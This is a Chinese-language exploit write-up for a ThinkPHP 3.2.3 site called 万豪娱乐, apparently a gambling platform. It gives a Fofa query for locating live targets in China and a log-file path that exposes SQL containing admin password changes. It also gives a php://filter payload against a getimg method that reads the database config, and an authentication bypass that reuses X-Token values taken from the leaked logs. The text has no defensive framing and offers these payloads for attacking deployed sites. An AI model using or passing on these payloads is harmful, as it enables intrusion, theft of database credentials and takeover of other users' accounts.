万豪娱乐几处漏洞

前端⾃⾏寻找或下载APP端查找
Fofa(模糊搜索):"Public/Js/Mobile" && country="CN"

框架:Thinkphp 3.2.3 Debug:True

0x01 前台Log⽇志泄露漏洞

Payload:

Application/Runtime/Logs/Admin/24_06_09.log ///这个格式

直接访问即可看到当天后台执⾏的SQL语句，运⽓好还能翻到修改管理员密码的SQL语句

0x02 前台任意⽂件读取漏洞

在 /Application/Home/Controller/GameController.class.php 控制器中的getimg⽅法通过
file_get_contents函数读取⽂件或⽹络⽂件并保存到本地中，且传⼊参数url和id均可控，导致漏洞产⽣.
//保存⽹络图⽚
function getimg($url,$id)
{
$state = @file_get_contents($url,0,null,0,1);//获取⽹络资源的字符内容
if($state){
$filename = './public/gamelist/'.$id.'.jpg';//⽂件名称与路径
ob_start();//打开输出
readfile($url);//输出图⽚⽂件
$img = ob_get_contents();//得到浏览器输出
ob_end_clean();//清除输出并关闭
$size = strlen($img);//得到图⽚⼤⼩
$fp2 = @fopen($filename, "a");
fwrite($fp2, $img);//向当前⽬录写⼊图⽚⽂件，并重新命名
fclose($fp2);
return 1;
} else{
return 0;
}
}

url为你想要读取的内容，⽀持伪协议啥的，其中id为⾃定义⽂字或数字(1-119不能命名，否则会失败，其
他随意)
Payload(读取数据库⽂件)
/Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Appl
ication/Common/Conf/config.php&id=1993
访问之后直接保存 /public/gamelist/1993.jpg 的图⽚，保存下来就是读取到的内容

0x03 前台权限绕过漏洞

在 /Home/Controller/CommonController.class.php 控制器中，定义了普通⽤户鉴权的⽅法，这⾥使
⽤验证⽤户的Header HTTP_X_TOKEN，实际上这个头我们可以⾃定义.

如果没有传⼊X-token 就会直接返回 NOTLOGIN，那其home控制器下的⼤部分⽅法我们就⽆法使⽤

但是我们传⼊X-token之后，就可以直接使⽤别⼈的账户登录，这⾥X-Token我们如何获取呢 ?
这⾥就⽤到上⽂所述的前台Log⽇志泄露漏洞了，不管是前台后台的⽇志，只要有⼈进⾏登录或者改密操
作，就能获取到Token